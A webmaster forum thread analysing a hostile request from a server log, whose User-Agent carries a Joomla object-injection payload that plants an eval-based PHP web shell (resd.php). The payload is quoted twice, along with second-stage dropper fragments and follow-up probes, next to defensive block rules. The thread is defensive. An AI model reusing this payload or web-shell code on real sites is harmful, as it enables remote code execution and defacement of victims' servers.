Forum Moderators: open
Http Code: 403 Date: Jun 30 04:53:03 Http Version: HTTP/1.1 Size in Bytes: 13
Referer: -
Agent: }__test|O:21:\JDatabaseDriverMysqli\:3:{s:2:\fc\;O:17:\JSimplepieFactory\:0:{}s:21:\\\0\\0\\0disconnectHandlers\;a:1:{i:0;a:2:{i:0;O:9:\SimplePie\:5:{s:8:\sanitize\;O:20:\JDatabaseDriverMysql\:0:{}s:8:\feed_url\;s:234:\file_put_contents($_SERVER[\DOCUMENT_ROOT\].chr(47).\resd.php\,\|=|\\x3C\.chr(63).\php \\x24mujj=\\x24_POST['h'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\\\\\\\x24safedg=\\x24xsser;\\\);}\);JFactory::getConfig();exit;\;s:19:\cache_name_function\;s:6:\assert\;s:5:\cache\;b:1;s:11:\cache_class\;O:20:\JDatabaseDriverMysql\:0:{}}i:1;s:4:\init\;}}s:13:\\\0\\0\\0connection\;b:1;}~\xd9
Host: Krypt Technologies
98.126.0.0 - 98.126.255.255
98.126.0.0/16
Type: Corporate
Assignment: Static IP
Country: United States
State/Region: California
City: Orange
[edited by: keyplyr at 10:41 pm (utc) on Jun 30, 2016]
[edit reason] Please use host range & not call out a private customer who may just be hack victim [/edit]
the longest UA I've ever seen
\\x3C\.chr(63).\php String match "}__test|"
I'd call it the dumbest robot-script-writer I've ever seenIt just displayed in the server access log like that. There's more to it.
it is entirely possible for the script injection to be successful
file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"404-bak.php\",\"|=|\\x3C\".chr(63).\"php $check = $_SERVER['DOCUMENT_ROOT'] . "/tmp/kurd.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode(
(that sounds as if it's saying "check whether I've been here before" but as we all know I only speak three words of php so I couldn't find the rest) leading to the second layer, which includes the line $check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
and lots of other fun stuff including a new <title> tag that says "Hacked by soandso", some text in comic sans (really) and a bunch of stuff about Kurdistan (really, again), and function Random($length = 4) {
$pit = 'abcdefghijklmnopqrstuvwxyz';
$rands = '';
for ($i = 0; $i < $length; $i++) {
$rands .= $pit[rand(0, strlen($pit) - 1)];
}
return $rands;
}
Er... isn't that one of those randomizer functions that gets written up in thedailywtf dot com? [edited by: keyplyr at 2:52 am (utc) on Jul 1, 2016]
GetCapabilities
[edited by: lucy24 at 3:02 am (utc) on Jul 1, 2016]
Block all parameters, unless you use them.
RewriteCond %{QUERY_STRING} .
RewriteCond %{REQUEST_URI} ^/(.*)
RewriteRule (^|/|\.html)$ http://example.com/%1? [R=301,L]
For php there's a comprehensive THE_REQUEST block. I guess they could get into piwik if they appended their parameters to the correct filename. Host: 98.126.200.xxx
/
Http Code: 403 Date: Jun 30 04:53:03 Http Version: HTTP/1.1 Size in Bytes: 13
Referer: -
Agent: }__test|O:21:\JDatabaseDriverMysqli\:3:{s:2:\fc\;O:17:\JSimplepieFactory\:0:{}s:21:\\\0\\0\\0disconnectHandlers\;a:1:{i:0;a:2:{i:0;O:9:\SimplePie\:5:{s:8:\sanitize\;O:20:\JDatabaseDriverMysql\:0:{}s:8:\feed_url\;s:234:\file_put_contents($_SERVER[\DOCUMENT_ROOT\].chr(47).\resd.php\,\|=|\\x3C\.chr(63).\php \\x24mujj=\\x24_POST['h'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\\\\\\\x24safedg=\\x24xsser;\\\);}\);JFactory::getConfig();exit;\;s:19:\cache_name_function\;s:6:\assert\;s:5:\cache\;b:1;s:11:\cache_class\;O:20:\JDatabaseDriverMysql\:0:{}}i:1;s:4:\init\;}}s:13:\\\0\\0\\0connection\;b:1;}~\xd9
/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=cmVzZC5waHA%3d&z4=L3dwLWNvbnRlbnQvcGx
Http Code: 404 Date: Jun 30 12:16:27 Http Version: HTTP/1.1 Size in Bytes: 795
Referer: www.example.com
Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
/wp-content/plugins/resd.php
Http Code: 404 Date: Jun 30 12:16:28 Http Version: HTTP/1.1 Size in Bytes: 795
Referer: http://www.googlebot.com/bot.html
Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
ErrorDocument 403 "Access Denied" So they're given a 503? Or a 403 but a server page instead of your error page?
I would be inclined to submit that to Kaspersky
So I would appreciate it if someone could summarize it in a simplified way.
I think you can get a list of "also on this IP" through robtex.